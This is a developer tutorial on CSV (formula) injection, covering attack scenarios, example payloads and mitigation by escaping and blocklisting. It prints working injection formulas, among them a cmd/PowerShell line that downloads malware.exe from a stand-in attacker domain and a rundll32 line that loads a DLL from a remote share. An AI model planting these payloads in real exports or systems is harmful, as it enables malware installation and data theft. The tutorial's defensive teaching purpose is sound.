CSV Injection Tutorial for Beginner Developers (with examples)

It’s common in coding to work with CSV (Comma Separated Values) files to transfer data between platforms or allow users to download files that can then be used in their favorite application. CSV files are just text files where each value in a record is separated by a comma. As a developer, you often need to add exporting data functionality to your application, but you also must consider that this functionality could add vulnerabilities, namely CSV injection (also known as formula injection).

The data exported to a CSV file can be basic text, or it could be malicious formulas. Excel provides ways for users to create macros or formulas, which is generally used to perform mathematical calculations, but they could also be used to harmlessly open a program or download important data. With malicious formulas, however, your export functionality could be used to download and run malware on a local machine, make external network calls, display malicious links to phishing sites, or steal data and send it to an attacker.

How Does Formula Injection Happen?

Most developers work with Excel or CSV file generation when they build reports or logging tools that also have an export feature. Users with all kinds of permissions on the network look at reports on their screens and then click a button to export data to a CSV file. They can then use this file to build their own reports either in Excel, Word or PowerPoint. They aren’t aware that this functionality could be used to load malware on their system.

Custom logging tools used to monitor user input will take a snapshot of input and store it in files. For example, suppose that you want to capture authentication requests, both successful and failed. You might write a username to the file to determine which user authenticated or tried to authenticate. Note: You should never write passwords to logs. You can then build reports for administrators to review and detect suspicious authentication behavior. Administrators are high-privilege users, so an attacker could use this vulnerability to steal sensitive data or install malware on critical systems.

If you don’t validate that data isn’t malicious, the export functionality could be used to compromise the system. Let’s say you use this Python snippet to write user input to a csv file:

user_input = “=cmd|'/C powershell IEX(wget myransomwaresite.com/malware.exe)'!A0”

logged_authenticated_users = open(“users.csv”,'w')

logged_authenticated_users.write(user_input)

In the above code, the user input is a malicious Excel formula. The input is a PowerShell command later written to the CSV file. The command automatically downloads the file malware.exe from an attacker-controlled domain myransomwaresite.com. When the user opens the CSV file, the PowerShell application is automatically invoked and the file is silently downloaded.

This is a simplistic example, but this could be used to install malware on the local machine. Once an attacker realizes that data is exported from user input, they would get to work entering these types of values.

What Can Be Done with a CSV Injection Attack

At first, you might think that opening a program on the local machine is not a big issue, but so much more can be done with a successful CSV injection attack. In the previous section, you saw example input that could be used to download a malicious file. Here are a few more scenarios that would benefit an attacker:

Automatically download malware and install it on the local machine. For example, install ransomware to cripple the organization and demand a large payment.
Credential theft. The HYPERLINK Excel function creates a link in the spreadsheet. A malicious link could lead to an attacker-controlled server where users can be tricked into entering their credentials, either for corporate applications or public ones (e.g., Google account information to authenticate into a user’s Google Drive).
Stolen data. Using the IMPORTXML function, an attacker could pull data from a corporate Google Doc (e.g. a spreadsheet or document) and send it to the attacker.
Launch a distributed denial-of-service (DDoS). Excel will use basic commands from the command line. The ping command could be used to target a victim server. With enough users opening the CSV file at the same time, it could put heavy strain on the target server and cause issues with performance and functionality.

Example CSV Injection Payloads

Using the four scenarios above, here are example payloads that you might see used in a formula injection attack. The payloads below are what the attacker would try to inject into a CSV file.

The below code silently downloads malware.exe from the attacker’s ransomware site using PowerShell.

=cmd|'/C powershell IEX(wget myransomwaresite.com/malware.exe)'!A0

The below code executes a remote DLL file 1.dll from the share \\10.0.0.1\3\2\.

=cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1

The following command opens Notepad. Although Notepad is not a malicious program, this formula can be used to run other programs on the local machine.

=cmd|' /C notepad'!'A1'

The following formula can be used to bypass specific code validation that ensures there is a valid math formula present. It bypasses validation and executes the user’s calculator program.

=10+20+cmd|' /C calc'!A0

The following formula uses the Excel Dynamic Data Exchange (DDE) to run a program, specifically opening the local machine’s calculator program.

DDE ("cmd";"/C calc";"!A0")A0

The following formula looks like a simple SUM formula but it appends a command that will open the local machine’s calculator.

@SUM(1+9)*cmd|' /C calc'!A0

How to Code for CSV Injection Mitigation?

To validate if your code is vulnerable to formula injection, use your application as if you’re a user and enter the following as input:

=cmd|'/C calc.exe'!A0

Export data to a CSV and open it in Excel. If the calculator opens, then you know that your application is vulnerable.

The first step is to determine if Excel special characters should be allowed as input. For example, if you’re logging usernames and they are not allowed to have special characters in them, then blacklist the following characters from exporting or (even better) being stored:

For any exportable data, always escape special characters by prefixing a single tick character ( ‘ ) in front of them. For example, the above payload would become:

‘=cmd|'/C calc.exe'!A0

By escaping special characters, you tell Excel to print the formula as simple text, and it won’t execute the formula.

A combination of blacklisting certain characters, whitelisting only allowed domains, and escaping special characters exported to CSV files, you can make your code safer from this attack.